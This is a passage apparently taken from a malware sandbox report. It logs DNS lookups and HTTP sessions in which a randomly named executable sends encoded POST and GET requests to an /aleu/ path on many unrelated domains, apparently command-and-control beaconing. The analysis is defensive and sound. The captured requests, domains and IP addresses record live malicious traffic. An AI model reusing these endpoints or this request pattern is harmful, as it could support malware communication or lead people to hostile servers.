                            May 14, 2024 12:53:59.378139973 CEST192.168.2.101.1.1.10x9d7aStandard query (0)www.solesense.proA (IP address)IN (0x0001)false
                            May 14, 2024 12:54:13.968076944 CEST192.168.2.101.1.1.10xeb44Standard query (0)www.onitsuka-ksa.comA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            May 14, 2024 12:50:58.327395916 CEST1.1.1.1192.168.2.100x7d36No error (0)www.maxiwalls.com79.98.25.1A (IP address)IN (0x0001)false
                            May 14, 2024 12:51:14.205104113 CEST1.1.1.1192.168.2.100xc178Name error (3)www.choosejungmann.comnonenoneA (IP address)IN (0x0001)false
                            May 14, 2024 12:51:22.663315058 CEST1.1.1.1192.168.2.100xfbbaNo error (0)www.paydayloans3.shop64.190.62.22A (IP address)IN (0x0001)false
                            May 14, 2024 12:51:37.799149036 CEST1.1.1.1192.168.2.100xd609No error (0)www.colchondealquiler.com217.76.128.34A (IP address)IN (0x0001)false
                            May 14, 2024 12:51:53.415422916 CEST1.1.1.1192.168.2.100x1a71No error (0)www.www60270.xyzfix01.pfw.djamxtvyk.cloudland3.comCNAME (Canonical name)IN (0x0001)false
                            May 14, 2024 12:51:53.415422916 CEST1.1.1.1192.168.2.100x1a71No error (0)fix01.pfw.djamxtvyk.cloudland3.com52.175.38.24A (IP address)IN (0x0001)false
                            May 14, 2024 12:52:08.099003077 CEST1.1.1.1192.168.2.100xfd91No error (0)www.skibinscy-finanse.pl178.211.137.59A (IP address)IN (0x0001)false
                            May 14, 2024 12:52:23.705004930 CEST1.1.1.1192.168.2.100x25bfName error (3)www.avoshield.comnonenoneA (IP address)IN (0x0001)false
                            May 14, 2024 12:52:33.259222031 CEST1.1.1.1192.168.2.100x7692No error (0)www.fairmarty.top203.161.46.103A (IP address)IN (0x0001)false
                            May 14, 2024 12:52:46.909271955 CEST1.1.1.1192.168.2.100x7e0fName error (3)www.theertyuiergthjk.homesnonenoneA (IP address)IN (0x0001)false
                            May 14, 2024 12:52:56.426670074 CEST1.1.1.1192.168.2.100xfa44No error (0)www.aprovapapafox.comaprovapapafox.comCNAME (Canonical name)IN (0x0001)false
                            May 14, 2024 12:52:56.426670074 CEST1.1.1.1192.168.2.100xfa44No error (0)aprovapapafox.com162.240.81.18A (IP address)IN (0x0001)false
                            May 14, 2024 12:53:11.274075985 CEST1.1.1.1192.168.2.100x9feeNo error (0)www.83634.cnsxp92m4v.as22566.comCNAME (Canonical name)IN (0x0001)false
                            May 14, 2024 12:53:11.274075985 CEST1.1.1.1192.168.2.100x9feeNo error (0)sxp92m4v.as22566.comvf3ba6qx.as22566.comCNAME (Canonical name)IN (0x0001)false
                            May 14, 2024 12:53:11.274075985 CEST1.1.1.1192.168.2.100x9feeNo error (0)vf3ba6qx.as22566.com103.93.125.69A (IP address)IN (0x0001)false
                            May 14, 2024 12:53:11.274107933 CEST1.1.1.1192.168.2.100x9feeNo error (0)www.83634.cnsxp92m4v.as22566.comCNAME (Canonical name)IN (0x0001)false
                            May 14, 2024 12:53:11.274107933 CEST1.1.1.1192.168.2.100x9feeNo error (0)sxp92m4v.as22566.comvf3ba6qx.as22566.comCNAME (Canonical name)IN (0x0001)false
                            May 14, 2024 12:53:11.274107933 CEST1.1.1.1192.168.2.100x9feeNo error (0)vf3ba6qx.as22566.com103.93.125.69A (IP address)IN (0x0001)false
                            May 14, 2024 12:53:26.837361097 CEST1.1.1.1192.168.2.100x4173Name error (3)www.polhi.lolnonenoneA (IP address)IN (0x0001)false
                            May 14, 2024 12:53:36.097302914 CEST1.1.1.1192.168.2.100x7d2No error (0)www.valentinaetommaso.itmatrimoniovalentinaetommaso.webnode.itCNAME (Canonical name)IN (0x0001)false
                            May 14, 2024 12:53:36.097302914 CEST1.1.1.1192.168.2.100x7d2No error (0)matrimoniovalentinaetommaso.webnode.itlb.webnode.ioCNAME (Canonical name)IN (0x0001)false
                            May 14, 2024 12:53:36.097302914 CEST1.1.1.1192.168.2.100x7d2No error (0)lb.webnode.io3.125.172.46A (IP address)IN (0x0001)false
                            May 14, 2024 12:53:36.097302914 CEST1.1.1.1192.168.2.100x7d2No error (0)lb.webnode.io3.73.27.108A (IP address)IN (0x0001)false
                            May 14, 2024 12:53:36.097326040 CEST1.1.1.1192.168.2.100x7d2No error (0)www.valentinaetommaso.itmatrimoniovalentinaetommaso.webnode.itCNAME (Canonical name)IN (0x0001)false
                            May 14, 2024 12:53:36.097326040 CEST1.1.1.1192.168.2.100x7d2No error (0)matrimoniovalentinaetommaso.webnode.itlb.webnode.ioCNAME (Canonical name)IN (0x0001)false
                            May 14, 2024 12:53:36.097326040 CEST1.1.1.1192.168.2.100x7d2No error (0)lb.webnode.io3.125.172.46A (IP address)IN (0x0001)false
                            May 14, 2024 12:53:36.097326040 CEST1.1.1.1192.168.2.100x7d2No error (0)lb.webnode.io3.73.27.108A (IP address)IN (0x0001)false
                            May 14, 2024 12:53:51.175049067 CEST1.1.1.1192.168.2.100xb6a8Name error (3)www.toyzonetshirts.comnonenoneA (IP address)IN (0x0001)false
                            May 14, 2024 12:53:59.826800108 CEST1.1.1.1192.168.2.100x9d7aNo error (0)www.solesense.proparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                            May 14, 2024 12:53:59.826800108 CEST1.1.1.1192.168.2.100x9d7aNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                            May 14, 2024 12:54:14.134896994 CEST1.1.1.1192.168.2.100xeb44Name error (3)www.onitsuka-ksa.comnonenoneA (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • www.maxiwalls.com
                            • www.paydayloans3.shop
                            • www.colchondealquiler.com
                            • www.skibinscy-finanse.pl
                            • www.fairmarty.top
                            • www.aprovapapafox.com
                            • www.83634.cn
                            • www.valentinaetommaso.it
                            • www.solesense.pro

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.104971879.98.25.1803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:50:58.665024042 CEST463OUTGET /aleu/?Fb=ok/gmcxpcerYYESWh7Vklw9Bm7swo7gbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBZ6tcFTr4k1D73FrQqb2KesrNG9gusQ==&Cvp=4jl0Z4R0O HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Host: www.maxiwalls.com
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            May 14, 2024 12:50:58.995083094 CEST1289INHTTP/1.1 200 OK
                            Date: Tue, 14 May 2024 10:50:58 GMT
                            Server: Apache
                            Cache-control: max-age=300
                            Vary: Accept-Encoding
                            Content-Length: 5662
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 38 30 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 35 63 61 33 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 69 76 2e 6c 74 2f 69 6d 61 67 65 73 2f 74 68 75 6d 62 6e 61 69 6c [TRUNCATED]
                            Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=2 [TRUNCATED]
                            May 14, 2024 12:50:58.995106936 CEST1289INData Raw: 0a 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 37 36 38 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 30 3e 0d 0a 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 3c 74 64 3e 0d 0a
                            Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top> <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas
                            May 14, 2024 12:50:58.995121002 CEST1289INData Raw: c4 97 6d c4 97 2c 20 6b 61 64 20 c5 a1 69 61 6e 64 69 65 6e 20 70 61 73 20 6d 75 73 20 73 61 76 6f 20 69 6e 74 65 72 6e 65 74 6f 20 73 76 65 74 61 69 6e 65 73 20 74 61 6c 70 69 6e 61 20 69 72 20 6d 75 6d 69 73 20 70 61 73 69 74 69 6b 69 20 64 61
                            Data Ascii: m, kad iandien pas mus savo interneto svetaines talpina ir mumis pasitiki daugiausiai alies gyventoj. <p> <table class=table> <tr> <th></th> <th>Patui</th> <th>Svetainei</th> <th>U
                            May 14, 2024 12:50:58.995136023 CEST1289INData Raw: 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 3e 2b 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 3c 74 72 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 20 20 20 20 20 20 20 3c 74 64 20
                            Data Ascii: <td>+</td> <td>+</td> </tr> <tr align=center> <td align=left>Reseller</td> <td>-</td> <td>-</td> <td>-</td> <td>+</td> </tr> <tr align=center> <td align=left
                            May 14, 2024 12:50:58.995156050 CEST710INData Raw: 6c 69 3e 3c 61 20 74 61 72 67 65 74 3d 5f 74 6f 70 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 76 2e 6c 74 2f 70 72 6f 66 65 73 69 6f 6e 61 6c 75 73 2d 68 6f 73 74 69 6e 67 61 73 2f 22 3e 50 72 6f 66 65 73 69 6f 6e 61 6c 75 73 20
                            Data Ascii: li><a target=_top href="https://www.iv.lt/profesionalus-hostingas/">Profesionalus hostingas</a> <li><a target=_top href="https://www.iv.lt/vps-serveriai/">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikata


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.104972064.190.62.22803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:51:23.089873075 CEST736OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.paydayloans3.shop
                            Origin: http://www.paydayloans3.shop
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 191
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.paydayloans3.shop/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 4a 72 62 59 4c 70 74 65 4c 56 6b 63 69 46 55 64 65 54 43 57 66 6e 5a 72 71 72 70 32 34 4e 74 30 66 54 46 47 4e 4c 66 55 64 32 6e 57 4a 56 73 59 37 4c 56 6d 53 59 33 67 32 41 57 4a 33 52 39 2b 45 6e 39 36 50 34 48 4c 77 42 33 4c 32 67 58 70 32 71 48 48 76 70 57 49 6b 52 55 59 51 45 51 70 70 47 2b 42 2f 51 73 47 70 37 79 30 46 57 77 4d 64 4b 68 34 45 2b 50 2b 6a 50 53 36 45 43 66 6c 4c 43 6f 45 35 2b 54 41 47 74 59 65 42 75 35 37 62 79 38 43 59 5a 64 43 64 74 62 6a 4d 78 7a 44 36 51 2f 41 4d 4e 33 36 58 4d 47 4b 34 73 6c 37
                            Data Ascii: Fb=uVtPTjiO9kY0JrbYLpteLVkciFUdeTCWfnZrqrp24Nt0fTFGNLfUd2nWJVsY7LVmSY3g2AWJ3R9+En96P4HLwB3L2gXp2qHHvpWIkRUYQEQppG+B/QsGp7y0FWwMdKh4E+P+jPS6ECflLCoE5+TAGtYeBu57by8CYZdCdtbjMxzD6Q/AMN36XMGK4sl7
                            May 14, 2024 12:51:23.395986080 CEST701INHTTP/1.1 405 Not Allowed
                            date: Tue, 14 May 2024 10:51:23 GMT
                            content-type: text/html
                            content-length: 556
                            server: NginX
                            connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.104972164.190.62.22803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:51:25.948530912 CEST760OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.paydayloans3.shop
                            Origin: http://www.paydayloans3.shop
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 215
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.paydayloans3.shop/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 62 36 72 59 4a 4b 56 65 48 6c 6b 66 76 56 55 64 49 6a 43 61 66 6e 6c 72 71 75 5a 6d 34 37 64 30 63 33 42 47 4d 4b 66 55 63 32 6e 57 42 31 74 53 6b 62 56 74 53 59 36 64 32 43 79 4a 33 53 42 2b 45 6c 6c 36 4f 4c 76 4d 78 52 33 7a 39 41 58 52 79 71 48 48 76 70 57 49 6b 52 41 2b 51 45 49 70 70 57 75 42 39 79 49 46 33 72 79 7a 41 6d 77 4d 5a 4b 68 38 45 2b 50 63 6a 4b 4b 63 45 41 6e 6c 4c 48 73 45 35 76 54 44 50 74 59 59 66 65 35 73 64 48 46 33 42 59 70 41 51 64 2f 79 65 68 4c 66 35 78 65 48 64 63 57 74 45 37 61 45 32 71 51 52 38 69 4a 5a 61 6c 5a 61 4d 77 43 66 33 62 76 78 62 43 38 75 31 67 3d 3d
                            Data Ascii: Fb=uVtPTjiO9kY0b6rYJKVeHlkfvVUdIjCafnlrquZm47d0c3BGMKfUc2nWB1tSkbVtSY6d2CyJ3SB+Ell6OLvMxR3z9AXRyqHHvpWIkRA+QEIppWuB9yIF3ryzAmwMZKh8E+PcjKKcEAnlLHsE5vTDPtYYfe5sdHF3BYpAQd/yehLf5xeHdcWtE7aE2qQR8iJZalZaMwCf3bvxbC8u1g==
                            May 14, 2024 12:51:26.259799004 CEST701INHTTP/1.1 405 Not Allowed
                            date: Tue, 14 May 2024 10:51:26 GMT
                            content-type: text/html
                            content-length: 556
                            server: NginX
                            connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.104972264.190.62.22803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:51:28.800075054 CEST1773OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.paydayloans3.shop
                            Origin: http://www.paydayloans3.shop
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 1227
                            Cache-Control: max-age=0
                            Connection: close
                            Referer: http://www.paydayloans3.shop/aleu/
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            Data Raw: 46 62 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 62 36 72 59 4a 4b 56 65 48 6c 6b 66 76 56 55 64 49 6a 43 61 66 6e 6c 72 71 75 5a 6d 34 37 56 30 66 43 56 47 4e 70 33 55 4e 47 6e 57 64 6c 74 66 6b 62 56 77 53 63 65 52 32 43 2b 5a 33 55 46 2b 57 51 35 36 4a 36 76 4d 34 52 33 7a 79 67 58 71 32 71 48 65 76 70 47 55 6b 52 51 2b 51 45 49 70 70 55 47 42 35 67 73 46 31 72 79 30 46 57 77 4c 64 4b 68 45 45 2b 57 68 6a 4f 57 54 45 77 48 6c 4c 6e 38 45 31 39 4c 44 58 39 59 61 65 65 34 70 64 48 42 65 42 59 30 2f 51 64 4c 59 65 67 2f 66 76 51 37 69 42 66 75 71 52 74 47 5a 70 37 6b 56 33 6d 31 69 57 58 77 6d 61 41 71 51 73 2f 2b 31 59 54 46 31 72 4a 56 78 36 6a 75 51 64 31 78 4e 37 79 75 4e 30 72 4c 2f 43 75 6a 58 34 44 77 52 59 75 71 6a 4c 36 76 67 72 36 57 71 38 45 45 4e 4a 71 45 4a 42 51 35 63 67 67 2b 7a 37 6a 74 36 39 54 53 49 66 70 6e 34 77 63 69 44 64 6c 4f 4f 66 34 42 68 70 38 72 50 71 58 61 4f 47 38 4d 32 55 6e 6f 78 4e 6f 42 79 79 4b 57 7a 69 42 42 66 70 52 4a 38 4d 46 6a 31 56 4e 72 49 4f 79 55 70 44 64 47 [TRUNCATED]
                            Data Ascii: Fb=uVtPTjiO9kY0b6rYJKVeHlkfvVUdIjCafnlrquZm47V0fCVGNp3UNGnWdltfkbVwSceR2C+Z3UF+WQ56J6vM4R3zygXq2qHevpGUkRQ+QEIppUGB5gsF1ry0FWwLdKhEE+WhjOWTEwHlLn8E19LDX9Yaee4pdHBeBY0/QdLYeg/fvQ7iBfuqRtGZp7kV3m1iWXwmaAqQs/+1YTF1rJVx6juQd1xN7yuN0rL/CujX4DwRYuqjL6vgr6Wq8EENJqEJBQ5cgg+z7jt69TSIfpn4wciDdlOOf4Bhp8rPqXaOG8M2UnoxNoByyKWziBBfpRJ8MFj1VNrIOyUpDdGv8YicIIs0giHXOEtbvD1XsMBLC484PWUOdwgfuKssM1KJkVVYGgE1qEaz+F4tEgAIrDVfVjG4tvCK8ry2iAqXXVWKr5cY0lXqFIi5r5kvd/mZWwDVufcI5J+KPrtRXLyaI84liOZ2cg5ATIwoCHUUmjaC9/6EG4NJKkm4lKIRTsAfE8D1KC8hyIKv4BSoI7qeRE1y1yduNIlRGyHANWhmCzeaavTr3WlLuBdh00e7yrcm1GIPfH0PExAsKlGHw6H4MChuOv789Pli4vxQ3gbg3O1sWxUX19kYEgQ6a8WWqHqSF0COqCdk++dJE783MornVSDJ6WScsI+y4xAHzDgcBB8QeDtRGl95ogkHk2jGJSd+UVPsWrfGqerDndYyU1+O88dR5m8aPHZtd9n3Ede6jML2bfo8/4fyriD0q1O+cGYQ14kgCpHEoK/rbdJSTfKWOlGNf2GhT04/n5B7opM/iDqFnRDKgiBFQMrlpnBxm7YS37zH/usbCfESRxOupcHrj70MRBnZBkOOoeqRIEgPbqdT7vSK0IJzK7P0D66fyMkMO+imG+eYMXtjPlYEU/BVlxj1ONPr/7dQsZDB47nCOU5xTIS6wAX4OO+9DVQrYWe59r1uXaSaO14DpMCweGzXdo+Dyf3qKApoOYx4qOKbTUe5gzcuZk+OG [TRUNCATED]
                            May 14, 2024 12:51:29.110132933 CEST701INHTTP/1.1 405 Not Allowed
                            date: Tue, 14 May 2024 10:51:28 GMT
                            content-type: text/html
                            content-length: 556
                            server: NginX
                            connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.104972364.190.62.22803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:51:31.633445024 CEST467OUTGET /aleu/?Fb=jXFvQTK4oWsNW5HaVP0aKlBegUUeN16TTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZmRruwwT7mrPw5MWe/TE7XFATw0m0gg==&Cvp=4jl0Z4R0O HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Host: www.paydayloans3.shop
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                            May 14, 2024 12:51:31.942078114 CEST107INHTTP/1.1 436
                            date: Tue, 14 May 2024 10:51:31 GMT
                            content-length: 0
                            server: NginX
                            connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.1049724217.76.128.34803464C:\Program Files (x86)\mlICtNIaCRPsoZIMSLkMJrlhqjpNthGoNhKSyNYX\ZkvvIsytMpWTrpZoKvbY.exe
                            TimestampBytes transferredDirectionData
                            May 14, 2024 12:51:38.135797024 CEST748OUTPOST /aleu/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate
                            Host: www.colchondealquiler.com
